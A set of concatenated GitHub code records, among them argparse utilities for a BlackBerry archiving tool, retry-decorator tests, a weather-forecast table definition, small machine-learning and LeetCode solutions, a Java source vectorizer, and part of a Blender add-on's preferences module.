subprocess # running cfp/cap\nimport sys # getattr\n\nfrom bbarchivist import bbconstants # constants\nfrom bbarchivist import utilities # version checking\n\n__author__ = \"Thurask\"\n__license__ = \"WTFPL v2\"\n__copyright__ = \"2018-2019 Thurask\"\n\n\ndef signed_file_args(files):\n    \"\"\"\n    Check if there are between 1 and 6 files supplied to argparse.\n\n    :param files: List of signed files, between 1 and 6 strings.\n    :type files: 
list(str)\n    \"\"\"\n    filelist = [file for file in files if file]\n    if not 1 <= len(filelist) <= 6:\n        raise argparse.ArgumentError(argument=None, message=\"Requires 1-6 signed files\")\n    return files\n\n\ndef file_exists(file):\n    \"\"\"\n    Check if file exists, raise argparse error if it doesn't.\n\n    :param file: Path to a file, including extension.\n    :type file: str\n    \"\"\"\n    if not os.path.exists(file):\n        raise argparse.ArgumentError(argument=None, message=\"{0} not found.\".format(file))\n    return file\n\n\ndef positive_integer(input_int):\n    \"\"\"\n    Check if number > 0, raise argparse error if it isn't.\n\n    :param input_int: Integer to check.\n    :type input_int: str\n    \"\"\"\n    if int(input_int) <= 0:\n        info = \"{0} is not >0.\".format(str(input_int))\n        raise argparse.ArgumentError(argument=None, message=info)\n    return int(input_int)\n\n\ndef valid_method_poptxz(methodlist):\n    \"\"\"\n    Remove .tar.xz support if system is too old.\n\n    :param methodlist: List of all methods.\n    :type methodlist: tuple(str)\n    \"\"\"\n    if not utilities.new_enough(3, 3):\n        methodlist = [x for x in bbconstants.METHODS if x != \"txz\"]\n    return methodlist\n\n\ndef valid_method(method):\n    \"\"\"\n    Check if compression method is valid, raise argparse error if it isn't.\n\n    :param method: Compression method to check.\n    :type method: str\n    \"\"\"\n    methodlist = bbconstants.METHODS\n    methodlist = valid_method_poptxz(methodlist)\n    if method not in methodlist:\n        info = \"Invalid method {0}.\".format(method)\n        raise argparse.ArgumentError(argument=None, message=info)\n    return method\n\n\ndef valid_carrier(mcc_mnc):\n    \"\"\"\n    Check if MCC/MNC is valid (1-3 chars), raise argparse error if it isn't.\n\n    :param mcc_mnc: MCC/MNC to check.\n    :type mcc_mnc: str\n    \"\"\"\n    if not str(mcc_mnc).isdecimal():\n        infod = \"Non-integer {0}.\".format(str(mcc_mnc))\n        raise argparse.ArgumentError(argument=None, message=infod)\n    if len(str(mcc_mnc)) > 3 or not str(mcc_mnc):\n        infol = \"{0} is invalid.\".format(str(mcc_mnc))\n        raise argparse.ArgumentError(argument=None, message=infol)\n    else:\n        return mcc_mnc\n\n\ndef escreens_pin(pin):\n    \"\"\"\n    Check if given PIN is valid, raise argparse error if it isn't.\n\n    :param pin: PIN to check.\n    :type pin: str\n    \"\"\"\n    if len(pin) == 8:\n        try:\n            int(pin, 16) # hexadecimal-ness\n        except ValueError:\n            raise argparse.ArgumentError(argument=None, message=\"Invalid PIN.\")\n        else:\n            return pin.lower()\n    else:\n        raise argparse.ArgumentError(argument=None, message=\"Invalid PIN.\")\n\n\ndef escreens_duration(duration):\n    \"\"\"\n    Check if Engineering Screens duration is valid.\n\n    :param duration: Duration to check.\n    :type duration: int\n    \"\"\"\n    if int(duration) in (1, 3, 6, 15, 30):\n        return int(duration)\n    else:\n        raise argparse.ArgumentError(argument=None, message=\"Invalid duration.\")\n\n\ndef droidlookup_hashtype(method):\n    \"\"\"\n    Check if Android autoloader lookup hash type is valid.\n\n    :param method: None for regular OS links, \"sha256/512\" for SHA256 or 512 hash.\n    :type method: str\n    \"\"\"\n    if method.lower() in (\"sha512\", \"sha256\"):\n        return method.lower()\n    else:\n        raise argparse.ArgumentError(argument=None, message=\"Invalid type.\")\n\n\ndef droidlookup_devicetype(device):\n    \"\"\"\n    Check if Android autoloader device type is valid.\n\n    :param device: Android autoloader types to check.\n    :type device: str\n    \"\"\"\n    devices = (\"Priv\", \"DTEK50\", \"DTEK60\", \"KEYone\", \"Aurora\", \"Motion\", \"KEY2\", \"KEY2LE\")\n    if device is None:\n        return None\n    else:\n        for dev in 
devices:\n if dev.lower() == device.lower():\n return dev\n raise argparse.ArgumentError(argument=None, message=\"Invalid device.\")\n\n\ndef shortversion():\n \"\"\"\n Get short app version (Git tag).\n \"\"\"\n if not getattr(sys, 'frozen', False):\n ver = bbconstants.VERSION\n else:\n verfile = glob.glob(os.path.join(os.getcwd(), \"version.txt\"))[0]\n with open(verfile) as afile:\n ver = afile.read()\n return ver\n\n\ndef longversion():\n \"\"\"\n Get long app version (Git tag + commits + hash).\n \"\"\"\n if not getattr(sys, 'frozen', False):\n ver = (bbconstants.LONGVERSION, bbconstants.COMMITDATE)\n else:\n verfile = glob.glob(os.path.join(os.getcwd(), \"longversion.txt\"))[0]\n with open(verfile) as afile:\n ver = afile.read().split(\"\\n\")\n return ver\n\n\ndef slim_preamble(appname):\n \"\"\"\n Standard app name header.\n\n :param appname: Name of app.\n :type appname: str\n \"\"\"\n print(\"~~~{0} VERSION {1}~~~\".format(appname.upper(), shortversion()))\n\n\ndef standard_preamble(appname, osversion, softwareversion, radioversion, altsw=None):\n \"\"\"\n Standard app name, OS, radio and software (plus optional radio software) print block.\n\n :param appname: Name of app.\n :type appname: str\n\n :param osversion: OS version, 10.x.y.zzzz. Required.\n :type osversion: str\n\n :param radioversion: Radio version, 10.x.y.zzzz. Can be guessed.\n :type radioversion: str\n\n :param softwareversion: Software release, 10.x.y.zzzz. Can be guessed.\n :type softwareversion: str\n\n :param altsw: Radio software release, if not the same as OS.\n :type altsw: str\n \"\"\"\n slim_preamble(appname)\n print(\"OS VERSION: {0}\".format(osversion))\n print(\"OS SOFTWARE VERSION: {0}\".format(softwareversion))\n print(\"RADIO VERSION: {0}\".format(radioversion))\n if altsw is not None:\n print(\"RADIO SOFTWARE VERSION: {0}\".format(altsw))\n\n\n\ndef default_parser_vers(vers=None):\n \"\"\"\n Prepare version for default parser.\n\n :param vers: Versions: [git commit hash, git commit date]\n :param vers: list(str)\n \"\"\"\n if vers is None:\n vers = longversion()\n return vers\n\n\ndef default_parser_flags(parser, flags=None):\n \"\"\"\n Handle flags for default parser.\n\n :param parser: Parser to modify.\n :type parser: argparse.ArgumentParser\n\n :param flags: Tuple of sections to add.\n :type flags: tuple(str)\n \"\"\"\n if flags is not None:\n parser = dpf_flags_folder(parser, flags)\n parser = dpf_flags_osr(parser, flags)\n return parser\n\n\ndef dpf_flags_folder(parser, flags=None):\n \"\"\"\n Add generic folder flag to parser.\n\n :param parser: Parser to modify.\n :type parser: argparse.ArgumentParser\n\n :param flags: Tuple of sections to add.\n :type flags: tuple(str)\n \"\"\"\n if \"folder\" in flags:\n parser.add_argument(\"-f\",\n \"--folder\",\n dest=\"folder\",\n help=\"Working folder\",\n default=None,\n metavar=\"DIR\",\n type=file_exists)\n return parser\n\n\ndef dpf_flags_osr(parser, flags=None):\n \"\"\"\n Add generic OS/radio/software flags to parser.\n\n :param parser: Parser to modify.\n :type parser: argparse.ArgumentParser\n\n :param flags: Tuple of sections to add.\n :type flags: tuple(str)\n \"\"\"\n if \"osr\" in flags:\n parser.add_argument(\"os\",\n help=\"OS version\")\n parser.add_argument(\"radio\",\n help=\"Radio version, 10.x.y.zzzz\",\n nargs=\"?\",\n default=None)\n parser.add_argument(\"swrelease\",\n help=\"Software version, 10.x.y.zzzz\",\n nargs=\"?\",\n default=None)\n return parser\n\n\ndef default_parser(name=None, desc=None, flags=None, vers=None):\n 
\"\"\"\n A generic form of argparse's ArgumentParser.\n\n :param name: App name.\n :type name: str\n\n :param desc: App description.\n :type desc: str\n\n :param flags: Tuple of sections to add.\n :type flags: tuple(str)\n\n :param vers: Versions: [git commit hash, git commit date]\n :param vers: list(str)\n \"\"\"\n vers = default_parser_vers(vers)\n homeurl = \"https://github.com/thurask/bbarchivist\"\n parser = argparse.ArgumentParser(prog=name, description=desc, epilog=homeurl)\n parser.add_argument(\"-v\",\n \"--version\",\n action=\"version\",\n version=\"{0} {1} committed {2}\".format(parser.prog, vers[0], vers[1]))\n parser = default_parser_flags(parser, flags)\n return parser\n\n\ndef generic_windows_shim(scriptname, scriptdesc, target, version):\n \"\"\"\n Generic CFP/CAP runner; Windows only.\n\n :param scriptname: Script name, 'bb-something'.\n :type scriptname: str\n\n :param scriptdesc: Script description, i.e. scriptname -h.\n :type scriptdesc: str\n\n :param target: Path to file to execute.\n :type target: str\n\n :param version: Version of target.\n :type version: str\n \"\"\"\n parser = default_parser(scriptname, scriptdesc)\n capver = \"|{0}\".format(version)\n parser = external_version(parser, capver)\n parser.parse_known_args(sys.argv[1:])\n if utilities.is_windows():\n subprocess.call([target] + sys.argv[1:])\n else:\n print(\"Sorry, Windows only.\")\n\n\ndef arg_verify_none(argval, message):\n \"\"\"\n Check if an argument is None, error out if it is.\n\n :param argval: Argument to check.\n :type argval: str\n\n :param message: Error message to print.\n :type message: str\n \"\"\"\n if argval is None:\n raise argparse.ArgumentError(argument=None, message=message)\n\n\ndef external_version(parser, addition):\n \"\"\"\n Modify the version string of argparse.ArgumentParser, adding something.\n\n :param parser: Parser to modify.\n :type parser: argparse.ArgumentParser\n\n :param addition: What to add.\n :type addition: str\n \"\"\"\n verarg = [arg for arg in parser._actions if isinstance(arg, argparse._VersionAction)][0]\n verarg.version = \"{1}{0}\".format(addition, verarg.version)\n return parser\n","repo_name":"thurask/bbarchivist","sub_path":"bbarchivist/argutils.py","file_name":"argutils.py","file_ext":"py","file_size_in_byte":10635,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"83"} +{"seq_id":"34511612672","text":"from logging import getLogger\n\nimport pytest\n\nfrom aspectlib import contrib\nfrom aspectlib.contrib import retry\nfrom aspectlib.test import LogCapture\n\n\ndef flaky_func(arg):\n if arg:\n arg.pop()\n raise OSError('Tough luck!')\n\n\ndef test_done_suceess():\n calls = []\n\n @retry\n def ok_func():\n calls.append(1)\n\n ok_func()\n assert calls == [1]\n\n\ndef test_defaults():\n calls = []\n retry(sleep=calls.append)(flaky_func)([None] * 5)\n assert calls == [0, 0, 0, 0, 0]\n\n\ndef test_raises():\n calls = []\n pytest.raises(OSError, retry(sleep=calls.append)(flaky_func), [None] * 6)\n assert calls == [0, 0, 0, 0, 0]\n\n calls = []\n pytest.raises(OSError, retry(sleep=calls.append, retries=1)(flaky_func), [None, None])\n assert calls == [0]\n\n\ndef test_backoff():\n calls = []\n retry(sleep=calls.append, backoff=1.5)(flaky_func)([None] * 5)\n assert calls == [1.5, 1.5, 1.5, 1.5, 1.5]\n\n\ndef test_backoff_exponential():\n calls = []\n retry(sleep=calls.append, retries=10, backoff=retry.exponential_backoff)(flaky_func)([None] * 10)\n print(calls)\n assert calls == [1, 2, 4, 8, 16, 32, 64, 128, 256, 
512]\n\n\ndef test_backoff_straight():\n calls = []\n retry(sleep=calls.append, retries=10, backoff=retry.straight_backoff)(flaky_func)([None] * 10)\n print(calls)\n assert calls == [1, 2, 5, 10, 15, 20, 25, 30, 35, 40]\n\n\ndef test_backoff_flat():\n calls = []\n retry(sleep=calls.append, retries=10, backoff=retry.flat_backoff)(flaky_func)([None] * 10)\n print(calls)\n assert calls == [1, 2, 5, 10, 15, 30, 60, 60, 60, 60]\n\n\ndef test_with_class():\n logger = getLogger(__name__)\n\n class Connection(object):\n count = 0\n\n @retry\n def __init__(self, address):\n self.address = address\n self.__connect()\n\n def __connect(self, *_, **__):\n self.count += 1\n if self.count % 3:\n raise OSError(\"Failed\")\n else:\n logger.info(\"connected!\")\n\n @retry(cleanup=__connect)\n def action(self, arg1, arg2):\n self.count += 1\n if self.count % 3 == 0:\n raise OSError(\"Failed\")\n else:\n logger.info(\"action!\")\n\n def __repr__(self):\n return \"Connection@%s\" % self.count\n\n with LogCapture([logger, contrib.logger]) as logcap:\n try:\n conn = Connection(\"to-something\")\n for i in range(5):\n conn.action(i, i)\n finally:\n for i in logcap.messages:\n print(i)\n assert logcap.messages == [\n ('ERROR', \"__init__((Connection@1, 'to-something'), {}) raised exception Failed. 5 retries left. Sleeping 0 secs.\"),\n ('ERROR', \"__init__((Connection@1, 'to-something'), {}) raised exception Failed. 5 retries left. Sleeping 0 secs.\"),\n ('ERROR', \"__init__((Connection@2, 'to-something'), {}) raised exception Failed. 4 retries left. Sleeping 0 secs.\"),\n ('ERROR', \"__init__((Connection@2, 'to-something'), {}) raised exception Failed. 4 retries left. Sleeping 0 secs.\"),\n ('INFO', 'connected!'),\n ('INFO', 'action!'),\n ('INFO', 'action!'),\n ('ERROR', 'action((Connection@6, 2, 2), {}) raised exception Failed. 5 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@6, 2, 2), {}) raised exception Failed. 5 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@7, 2, 2), {}) raised exception Failed. 4 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@7, 2, 2), {}) raised exception Failed. 4 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@8, 2, 2), {}) raised exception Failed. 3 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@8, 2, 2), {}) raised exception Failed. 3 retries left. Sleeping 0 secs.'),\n ('INFO', 'connected!'),\n ('INFO', 'action!'),\n ('INFO', 'action!'),\n ('ERROR', 'action((Connection@12, 4, 4), {}) raised exception Failed. 5 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@12, 4, 4), {}) raised exception Failed. 5 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@13, 4, 4), {}) raised exception Failed. 4 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@13, 4, 4), {}) raised exception Failed. 4 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@14, 4, 4), {}) raised exception Failed. 3 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@14, 4, 4), {}) raised exception Failed. 3 retries left. 
Sleeping 0 secs.'),\n ('INFO', 'connected!'),\n ('INFO', 'action!'),\n ]\n","repo_name":"ionelmc/python-aspectlib","sub_path":"tests/test_contrib.py","file_name":"test_contrib.py","file_ext":"py","file_size_in_byte":4732,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"83"} +{"seq_id":"33950303898","text":"##\n# This software was developed and / or modified by Raytheon Company,\n# pursuant to Contract DG133W-05-CQ-1067 with the US Government.\r\n# \r\n# U.S. EXPORT CONTROLLED TECHNICAL DATA\r\n# This software product contains export-restricted data whose\n# export/transfer/disclosure is restricted by U.S. law. Dissemination\n# to non-U.S. persons whether in the United States or abroad requires\n# an export license or other authorization.\n# \n# Contractor Name: Raytheon Company\r\n# Contractor Address: 6825 Pine Street, Suite 340\r\n# Mail Stop B8\r\n# Omaha, NE 68106\r\n# 402.291.0100\r\n# \r\n# See the AWIPS II Master Rights File (\"Master Rights File.pdf\") for\n# further licensing information.\n##\n########################################################################\n# RDFcst\n#\n########################################################################\n## EXAMPLE OUTPUT:\n##\n## 24 Hour Tabular Forecast for Boulder for 12 AM MST Mar 21 TO 12 PM MST Mar 21.\n##\n## Weather Element 12 AM 3 AM 6 AM 9 AM\n##\n## Temperature 30 28 29\n## Dew Point 25 23 25\n## Wind (mph) NW 4 NW 5 NW 6\n## Sky Cover(%) MOSTLY MOSTLY MOSTLY\n## CLOUDY CLOUDY CLOUDY\n## Rainfall Amount(in.) 0.00 0.00 0.00 0.00\n## Weather RAIN RAIN\n## Snowfall(in.) 0 0 0 0\n##\n## This forecast was generated from a gridded database.\n\n\n# Forecast Definition\nRDFcst = {\n\n ## General Set-Up\n\n \"type\": \"table\",\n \"displayName\": \"RDFcst\", # for Product Generation Menu\n\n # Output file for product results\n \"outputFile\": \"/home/ifp/release/products/TEXT/RDFcst.txt\", # default output file\n \"runTimeOutputFile\": \"no\", # If yes, ask user at run time\n\n # Language\n \"language\": \"english\", # default\n \"runTimeLanguage\": \"no\", # If yes, ask user at run time\n\n # Line Length for resulting Product\n \"lineLength\": 79, # default\n \"runTimeLineLength\": \"no\", # If yes, ask user at run time\n\n # Text to preceed and follow the text product.\n # Remember to add spacing lines backslash n.\n # The variables: %TimePeriod, %EditArea, and %WeatherElement\n # can be included to be filled in with constant variables.\n # For phrase and combo, only %EditArea and %TimePeriod\n # can be filled in.\n \"timePeriodMethod\": \"localTRLabel\", ## localRangeLabel\n \"editAreaLoopBegText\": \"24 Hour Tabular Forecast for %EditArea for %TimePeriod. 
\\n\\n\",\n \"editAreaLoopEndText\": \"\\n\",\n \"endingText\": \"\\nThis forecast was generated from a gridded database.\\n\\n\\n\",\n\n ## Table Layout\n # A table is a combination of three variables:\n # edit areas, weather elements, and time periods\n # One of these variables is held constant,\n # one is assigned to rows and the other to columns.\n\n \"constantVariable\": \"EditArea\", ## \"TimePeriod\",\n \"rowVariable\": \"WeatherElement\", ## \"EditArea\",\n \"columnVariable\": \"TimePeriod\", ## \"WeatherElement\",\n \"columnJustification\":\"Right\",\n\n ## Edit Areas\n # If the edit area is the constant variable, specify\n # one area and whether to ask user at run time.\n # runTimeEditArea can be a list of areas and/or edit area\n # groups (groups will be expanded into areas) from which\n # the user will be able to choose.\n \"defaultEditAreas\": [\n (\"area1\", \"Area1\"),\n (\"area2\", \"Area2\"),\n (\"area3\", \"Area3\"),\n (\"area4\", \"Area4\")],\n \"runTimeEditAreas\": \"yes\",\n \"areaType\" : \"Edit Area\", # E.g. City, County, Basin, etc.\n\n # Time Ranges\n \"defaultRanges\": [\"Today\"],\n \"runTimeRanges\" : \"no\", # if yes, ask user at run time\n\n ## Weather Elements\n # elementList: List of Weather Element tuples:\n # Weather Element Name\n # Weather Element Label\n # If you want the label to appear on multiple lines,\n # use vertical bars as separators e.g. Maximum|Temperature\n # Analysis method -- Method to produce statistics from the data\n # ReportAs Method -- Method to format the analyzed value(s)\n # DataType: Scalar or Vector or Weather\n # Rounding increment e.g. 5 = round final value to\n # nearest multiple of 5\n # Conversion method\n # e.g. \"mphToKt\" converts from mph to knots\n #\n # If the weather element is the constant variable, only one\n # should be given.\n\n # Name , Label , Analysis Method , ReportAs Method ,\n # DataType , Rounding , Conversion\n\n \"elementList\": [\n (\"T\",\"Temperature\",\n \"avg\",\n \"singleValue\",\n \"Scalar\", 1, None),\n (\"Td\",\"Dew Point\",\n \"avg\",\n \"singleValue\",\n \"Scalar\", 1, None),\n (\"RH\",\"Relative Humidity(%)\",\n \"avg\",\n \"singleValue\",\n \"Scalar\", 1, None),\n (\"WindChill\",\"Wind Chill(F)\",\n \"avg\",\n \"singleValue\",\n \"Scalar\", 1, None),\n (\"Wind\",\"Wind (mph)\",\n \"vectorRange\",\n \"avgValue\",\n \"Vector\", 1, \"ktToMph\"),\n (\"Sky\",\"Sky Cover(%)\",\n \"avg\",\n \"cloudCover\",\n \"Scalar\", 5, None),\n (\"QPF\",\"Rainfall Amount(in.)\",\n \"avg\",\n \"singleValue\",\n \"Scalar\", .01, None),\n (\"Wx\",\"Weather \",\n \"dominantWx\",\n \"short_weather_phrase\",\n \"Scalar\", 1, None),\n (\"SnowAmt\",\"Snowfall(in.)\",\n \"avg\",\n \"singleValue\",\n \"Scalar\", 1, None),\n (\"PoP\", \"Precip (%)\",\n \"avg\",\n \"singleValue\",\n \"Scalar\", 1, None),\n ],\n\n ## Time Period (If rows or columns vary with TimePeriod\n # timePeriod: This is the interval in hours for sampling the data\n # e.g. every 3 hours.\n # (Can be floating point e.g. 1.5 hour TimePeriods)\n \"timePeriod\": 3,\n # timeSpan: This is the amount of data to sample at each\n # interval.\n # If you want the data analyzed (e.g averaged) over the\n # entire period, the timeSpan should be set to \"timePeriod\".\n # If you only want data for the beginning of each timePeriod,\n # the timeSpan should be set to number of hours over which\n # to analyze the data e.g. 
1 hour\n \"timeSpan\": 1,\n \"runTimePeriod\": \"no\", # If yes, ask user at run time for period\n # Method to label periods given a time range\n # periodLabel -- GMT time hourZ/day e.g. 15Z/4\n # localTimeLabel -- local time e.g. 6 AM\n # localRangeLabel -- local time range e.g. 6AM-9AM\n \"periodLabelMethod\": \"localTimeLabel\",\n\n ## User-supplied Methods\n # loopMethod: Method to be called for each row.\n # Such a method might keep ongoing statistics about table data.\n # Arguments: (rowLabel, rowEntries, userDict, argDict)\n # Returns: nothing\n # \"rowEntries\" is a list of (colValue, value) tuples\n # describing the entries in this row.\n # \"userDict\" is a dictionary set up for user-defined\n # callback methods so they can keep ongoing data as\n # the table is being produced.\n # It is not modified by the TextFormatter code.\n \"loopMethod\": None,\n\n # endMethod: Method to be called after table is complete.\n # Arguments: (table, userDict, argDict)\n # Returns: table (could be modified)\n # The table can be modified to report summary statistics\n # gathered in userDict.\n #\n \"endMethod\": None,\n }\n","repo_name":"Unidata/awips2","sub_path":"cave/com.raytheon.viz.gfe/python/testFormatters/RDFcst.py","file_name":"RDFcst.py","file_ext":"py","file_size_in_byte":8337,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"83"} +{"seq_id":"15840376550","text":"#!/usr/bin/env python3\n\"\"\"\nTensor output of the layer\n\"\"\"\nimport tensorflow as tf\n\n\ndef create_layer(prev, n, activation):\n \"\"\"\n Function that return the tensor output of the layer\n \"\"\"\n initial = tf.contrib.layers.variance_scaling_initializer(mode=\"FAN_AVG\")\n layer = tf.layers.Dense(units=n,\n activation=activation,\n kernel_initializer=initial,\n name='layer')\n return layer(prev)\n","repo_name":"Arghost91/holbertonschool-machine_learning","sub_path":"supervised_learning/0x02-tensorflow/1-create_layer.py","file_name":"1-create_layer.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71866642510","text":"#\n# @lc app=leetcode id=647 lang=python3\n#\n# [647] Palindromic Substrings\n#\nfrom lcimports import *\n# @lc code=start\nclass Solution:\n def countSubstrings(self, s: str) -> int:\n def getcount(l, r):\n count = 0\n while l >= 0 and r < len(s) and s[l] == s[r]:\n count += 1\n l -= 1\n r += 1\n return count\n \n count = 1\n for i in range(1, len(s)):\n l1 = getcount(i-1, i)\n l2 = getcount(i, i)\n count += l1 + l2\n return count\n \n# @lc code=end\n\n","repo_name":"architdate/leetcode","sub_path":"647.palindromic-substrings.py","file_name":"647.palindromic-substrings.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"35638155241","text":"import numpy as np\r\n\r\narray_to_find_nbrs = []\r\n\r\ndef get_elements(idx):\r\n if np.shape(array_to_find_nbrs[idx,:])[0] > 100:\r\n rand_int = np.random.choice(np.shape(array_to_find_nbrs[idx,:])[0], 100, replace=False)\r\n return array_to_find_nbrs[idx,:][rand_int,:]\r\n else:\r\n return array_to_find_nbrs[idx,:]\r\n\r\ndef get_covariance(arr):\r\n return np.cov(np.asarray(arr).T)\r\n\r\ndef calc_beta_rad(pvec):\r\n '''\r\n polar angle [0, pi]\r\n '''\r\n return np.arccos(pvec[2]) # arccos:[0, pi]\r\n\r\n\r\ndef calc_gamma_rad(pvec):\r\n '''\r\n azimuth angle [0, 2pi]\r\n '''\r\n gamma = np.arctan2(pvec[1], 
pvec[0])\r\n if gamma < 0.0:\r\n gamma += 2 * np.pi\r\n return gamma\r\n\r\ndef get_eigen_vals(cov_arr):\r\n cov_arr = np.nan_to_num(cov_arr, copy=True)\r\n ev, evals, ev_trans = np.linalg.svd(cov_arr, compute_uv=True)\r\n zen_angle_0 = calc_beta_rad(ev[:,0])\r\n azi_angle_0 = calc_gamma_rad(ev[:, 0])\r\n zen_angle_1 = calc_beta_rad(ev[:, 1])\r\n azi_angle_1 = calc_gamma_rad(ev[:, 1])\r\n zen_angle_2 = calc_beta_rad(ev[:, 2])\r\n azi_angle_2 = calc_gamma_rad(ev[:, 2])\r\n eval_ratio = evals/np.sum(evals)\r\n\r\n return np.column_stack((eval_ratio[0], eval_ratio[1], eval_ratio[2], zen_angle_0, zen_angle_1 ,zen_angle_2))\r\n\r\ndef get_vectorized_eigen_vals(nbrs, nbr_arr , knn_arr, rad, ratios = True):\r\n \"\"\"\r\n Function to calculate eigen values and vectors for the neighbors within a given radius of all the points in knn_arr\r\n\r\n Parameters\r\n ----------\r\n nbrs: Nearest neigbor classifier\r\n nbr_arr: numpy array\r\n Three-dimensional point cloud of a bigger area to construct the neighborhood data\r\n knn_arr: numpy array\r\n Three-dimensional point cloud of a subset of points from nbr_arr for which the eigen features are calculated\r\n rad: float\r\n Limiting distance of neighbors to return.\r\n\r\n Returns\r\n -------\r\n eval_ratio: arr\r\n Array of size (m x 6) where m is the number of points and first 3 columns refers to 3 eigen values corresponding to x, y and z dimension of\r\n the pointcloud and the next 3 columns are the zenith angle of the 3 eigen vetors\r\n\r\n \"\"\"\r\n\r\n print('Vectorized eigen val')\r\n nbr_idx = nbrs.radius_neighbors(knn_arr, radius=rad, return_distance=False)\r\n global array_to_find_nbrs\r\n array_to_find_nbrs = np.asarray(nbr_arr)\r\n \r\n print('Getting elements from index')\r\n \r\n get_elem_func = np.vectorize(get_elements, otypes=[np.object])\r\n arr_stack = get_elem_func(nbr_idx)\r\n print('Calculating covariance matrix')\r\n \r\n cov_func = np.vectorize(get_covariance, otypes=[np.object])\r\n cov_mat = cov_func(arr_stack)\r\n \r\n print('Calculating eigen values of the covariance matrix')\r\n \r\n eval_fun = np.vectorize(get_eigen_vals, otypes=[np.object])\r\n eval_ratio = eval_fun(cov_mat)\r\n #print(eval_ratio)\r\n return np.row_stack((eval_ratio))\r\n","repo_name":"sruthimoorthy/leaf_wood_clf","sub_path":"eigen_val_and_vec_features.py","file_name":"eigen_val_and_vec_features.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"83"} +{"seq_id":"29958120623","text":"import glob\nimport os.path\nimport numpy as np\nimport pandas as pd\nfrom pandas import DataFrame\nfrom collections import OrderedDict\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nimport javalang\nfrom pathlib import Path\n\nclass Parser:\n \"\"\"Class containing parsers\"\"\"\n \n __slots__ = ['name']\n \n def __init__(self, name):\n self.name = name\n\n \n def src_vectorizer(self):\n \"\"\"Parse source code directory of a program and collect\n its java files.\n \"\"\"\n \n parse_tree = None\n \n file = open(self.name,'r')\n #print(file.read())\n print('-----------------------------------------------------')\n vectorizer = CountVectorizer()\n # Looping to parse each source file\n \n for x in range (1):\n \n src = file.read()\n print(src)\n \n \n # Placeholder for different parts of a source file\n comments = ''\n class_names = []\n attributes = []\n method_names = []\n variables = []\n\n # Source parsing\n \n try:\n parse_tree = 
javalang.parse.parse(src)\n for path, node in parse_tree.filter(javalang.tree.VariableDeclarator):\n if isinstance(path[-2], javalang.tree.FieldDeclaration):\n attributes.append(node.name)\n elif isinstance(path[-2], javalang.tree.VariableDeclaration):\n variables.append(node.name)\n except:\n pass\n \n # Trimming the source file\n ind = False\n if parse_tree:\n if parse_tree.imports:\n last_imp_path = parse_tree.imports[-1].path\n src = src[src.index(last_imp_path) + len(last_imp_path) + 1:]\n elif parse_tree.package:\n package_name = parse_tree.package.name\n src = src[src.index(package_name) + len(package_name) + 1:]\n else: # There is no import and no package declaration\n ind = True\n # javalang can't parse the source file\n else:\n ind = True\n \n # create the transform\n vectorizer = TfidfVectorizer()\n # tokenize and build vocab\n vectorizer.fit([str(parse_tree)])\n # summarize\n print('---------------------------check 2----------------------------------')\n print(vectorizer.vocabulary_)\n vector = vectorizer.transform([str(parse_tree)])\n print(vector)\n print('---------------------check 3-------------------------------------------------------------')\n a=np.array(vector.toarray())\n print(a)\n print('---------------------check 4-------------------------------------------------------------')\n df = DataFrame(a)\n print(df)\n df.to_csv(r'godclasstextualdata.csv',mode='a',header=False)\n\n \n \n\nif __name__ == '__main__':\n parser = Parser('')\n\n srcfilesnames = pd.read_csv('allnames.csv')\n names= srcfilesnames.iloc[0:len(srcfilesnames),0]\n names=np.array(names)\n print(names)\n foundsrc=0\n notdound=0\n for i in range(names.shape[0]):\n try:\n fh = open(names[i]+\".java\", 'r')\n foundsrc=foundsrc+1\n parser = Parser(names[i]+'.java')\n parser.src_vectorizer()\n print(\"found\")\n except FileNotFoundError:\n notdound=notdound+1\n missingarray=(['notfound'])\n df = DataFrame(missingarray)\n df.to_csv(r'godclasstextualdata.csv',mode='a',header=False)\n print(\"notfound\")\n\n\n print(\"f \",foundsrc)\n print(\"notfound \",notdound) \n print(names)\n \n\n\n \n \n\n \n","repo_name":"Mostafa-Eltazy/Code-Smell-Detection","sub_path":"Code/Textual Feature Extraction.py","file_name":"Textual Feature Extraction.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"83"} +{"seq_id":"40383624443","text":"import bpy\nfrom . VGU_Pie import *\nimport rna_keymap_ui\nfrom . import utility_function\n\n\nIcon_Expose_Style = [(\"OLD\",\"Legacy\",\"Legacy\"),(\"PANEL\",\"Icon Panel\",\"Icon Panel\")]\n\n\nENUM_Tabs = [(\"PANELS\", \"Panels\", \"Panels\"), (\"KEYMAPS\",\"Keymaps\",\"Keymaps\")]\n\n\ndef append_panel_class(panels, cls, category, label):\n\n panel = cls \n item = [panel, category, label]\n panels.append(item)\n\n return panels\n\n\ndef update_panel(self, context):\n\n addon_preferences = utility_function.get_addon_preferences(context)\n \n message = \": Updating Panel locations has failed\"\n\n panels = []\n\n from . 
